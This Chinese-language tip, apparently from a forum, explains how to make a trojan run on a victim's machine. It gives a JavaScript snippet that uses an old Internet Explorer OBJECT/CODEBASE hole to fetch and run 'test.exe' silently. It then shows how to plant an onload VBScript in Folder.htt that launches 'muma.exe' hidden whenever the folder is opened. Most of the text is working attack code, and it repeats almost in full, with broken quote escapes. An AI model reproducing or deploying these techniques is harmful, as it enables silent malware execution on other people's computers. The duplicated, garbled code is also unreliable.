以前的代码是<script language="javascript">
run_exe="<OBJECT ID=/"RUNIT/" WIDTH=0 HEIGHT=0 TYPE=/"application/x-oleobject/""
run_exe+="CODEBASE=/"test.exe#version=1,1,1,1/">"
run_exe+="<PARAM NAME=/"_Version/" value=/"65536/">"
run_exe+="</OBJECT>"
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</script>
是利用了ie的漏洞,不过很多ie多升级了。没法利用:
我们还可以利用vbs达到这一目的:
在Folder.htt文件前面加:
<BODY οnlοad="vbscript :muma()">
在尾部加vbs代码:
<script language=vbscript>
function muma()
set wsh=CreateObject("WScript.Shell")
wsh.run "c:/winnt/system32/muma.exe",0
end function
</script>
run_exe="<OBJECT ID=/"RUNIT/" WIDTH=0 HEIGHT=0 TYPE=/"application/x-oleobject/""
run_exe+="CODEBASE=/"test.exe#version=1,1,1,1/">"
run_exe+="<PARAM NAME=/"_Version/" value=/"65536/">"
run_exe+="</OBJECT>"
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</script>
是利用了ie的漏洞,不过很多ie多升级了。没法利用:
我们还可以利用vbs达到这一目的:
在Folder.htt文件前面加:
<BODY οnlοad="vbscript :muma()">
在尾部加vbs代码:
<script language=vbscript>
function muma()
set wsh=CreateObject("WScript.Shell")
wsh.run "c:/winnt/system32/muma.exe",0
end function
</script>